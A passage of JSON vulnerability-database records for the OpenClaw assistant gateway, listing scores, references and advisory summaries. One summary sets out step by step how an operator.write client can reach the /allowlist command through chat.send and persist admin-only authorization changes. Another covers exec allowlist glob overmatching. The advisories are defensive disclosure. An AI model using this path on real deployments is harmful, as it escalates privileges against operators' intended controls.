"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2
/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-23T18:25:38Z/"}],"url":"https://github.com/openclaw/openclaw/commit/99ef3a63c58440d53f8e45ad861b846032fcb036"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-v8qf-fr4g-28p2","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-23T18:25:38Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-v8qf-fr4g-28p2"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41908","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41908"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-scope-enforcement-bypass-in-assistant-media-route","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-23T18:25:38Z/"}],"url":"https://www.vulncheck.com/advisories/o
penclaw-scope-enforcement-bypass-in-assistant-media-route"},{"reference_url":"https://github.com/advisories/GHSA-v8qf-fr4g-28p2","reference_id":"GHSA-v8qf-fr4g-28p2","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-v8qf-fr4g-28p2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109923?format=json","purl":"pkg:npm/openclaw@2026.4.20","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.20"}],"aliases":["CVE-2026-41908","GHSA-v8qf-fr4g-28p2"],"risk_score":1.9,"exploitability":"0.5","weighted_severity":"3.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-p8xd-2um4-9ufr"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91419?format=json","vulnerability_id":"VCID-p984-bgmq-zqc9","summary":"OpenClaw: Exec approval allowlist patterns overmatched on POSIX paths\n### Summary\n\n`matchesExecAllowlistPattern` normalized patterns and targets with lowercasing and compiled glob matching too broadly on POSIX. 
In addition, the `?` wildcard could match `/`, which allowed matches to cross path segments.\n\n### Impact\n\nThese matching rules could overmatch allowlist entries and permit commands or executable paths that an operator did not intend to approve.\n\n### Affected versions\n\n`openclaw` `<= 2026.3.8`\n\n### Patch\n\nFixed in `openclaw` `2026.3.11` and included in later releases such as `2026.3.12`. Exec allowlist matching now respects the intended path semantics, and regression tests cover the POSIX case-folding and slash-crossing cases.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-f8r2-vg7x-gh8m","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-f8r2-vg7x-gh8m"},{"reference_url":"https://github.com/advisories/GHSA-f8r2-vg7x-gh8m","reference_id":"GHSA-f8r2-vg7x-gh8m","reference_type":"","scores":[{"value":"MODERATE","scoring_system
":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-f8r2-vg7x-gh8m"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74883?format=json","purl":"pkg:npm/openclaw@2026.3.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{
"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{
"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{
"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{
"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{
"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.
3.11"}],"aliases":["GHSA-f8r2-vg7x-gh8m"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-p984-bgmq-zqc9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91065?format=json","vulnerability_id":"VCID-pa1f-qzsh-efa9","summary":"OpenClaw: Gateway operator.write Can Reach Admin-Class Channel Allowlist Persistence via chat.send\n> Fixed in OpenClaw 2026.3.24, the current shipping release.\n\n## Summary\n\nThe shared `/allowlist` command persists channel authorization config through `writeConfigFile(...)` but does not re-validate gateway client scopes for internal gateway callers. Because `chat.send` is intentionally reachable to `operator.write` callers and still creates a generic command-authorized internal context, an authenticated write-scoped gateway client can indirectly mutate channel `allowFrom` and `groupAllowFrom` policy that direct `config.patch` correctly reserves to `operator.admin`.\n\nThis is not just a generic code smell. The current code already shows the intended boundary by adding sink-side internal admin checks to shared `/config` and `/plugins` writes, but `/allowlist` was left behind.\n\n## Details\n\nThe gateway's documented scope split is clear:\n\n- `chat.send` is a write-scoped action.\n- direct config mutation is an admin-scoped action.\n\nThe vulnerable path is:\n\n1. A gateway client authenticates with `operator.write`.\n2. The client calls `chat.send`, which is intentionally allowed for that scope.\n3. `chat.send` builds an internal message context with `CommandAuthorized: true` and carries `GatewayClientScopes` into the reply pipeline.\n4. `resolveCommandAuthorization(...)` converts that internal message into `isAuthorizedSender=true` in the common case where no stricter `commands.allowFrom` override is configured.\n5. `/allowlist add|remove` accepts that generic command authorization and proceeds into its config-backed edit path.\n6. 
The handler clones the parsed config, calls `plugin.allowlist.applyConfigEdit(...)`, validates the result, and persists it with `writeConfigFile(validated.config)`.\n7. No sink-side check requires `operator.admin` before the persistent write occurs.\n\nThat creates a direct control-plane mismatch:\n\n- `config.patch` rejects the same caller with `missing scope: operator.admin`.\n- `/allowlist add dm ...` or `/allowlist add group ...` reached through `chat.send` can still rewrite channel authorization state.\n\n## Impact\n\n- A gateway client intentionally limited to `operator.write` can persist first-party channel authorization policy.\n- The caller can widen DM or group allowlists for channels using the shared `/allowlist` plumbing.\n- This weakens the repo's documented control-plane privilege split between ordinary write actions and admin-only persistent authorization mutation.\n\n## Remediation\n\n### 1) Add the Missing Sink-Side Internal Admin Check to `/allowlist`\n\nMirror the existing hardened pattern from `/config` and `/plugins`.\n\nBefore any config-backed `/allowlist add|remove` write, require:\n\n- `operator.admin` for internal gateway channels\n\nThis should happen before `plugin.allowlist.applyConfigEdit(...)` and before `writeConfigFile(...)`.\n\n### 2) Keep Pairing-Store and Config-Write Policy Checks, but Do Not Treat Them as Scope Enforcement\n\n`configWrites` policy and pairing-store behavior are useful secondary controls, but they do not replace the missing privilege check between `operator.write` and 
`operator.admin`.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35621","reference_id":"","reference_type":"","scores":[{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.1167","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.11631","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.11665","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35621"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-94pw-c6m8-p9p9","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:21:07Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-94pw-c6m8-p9p9"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35621","reference_id":"CVE-2026-35621","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35621"},{"reference_url":"https://github.com/advisories/GHSA-94pw-c6m8-p9p9","reference_id":"GHSA-94pw-c6m8-p9p9","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-94pw-c6m8-p9p9"},{"reference_url":"https://www.vulncheck
.com/advisories/openclaw-privilege-escalation-via-chat-send-to-allowlist-persistence","reference_id":"openclaw-privilege-escalation-via-chat-send-to-allowlist-persistence","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:21:07Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-chat-send-to-allowlist-persistence"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110567?format=json","purl":"pkg:npm/openclaw@2026.3.24","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerabi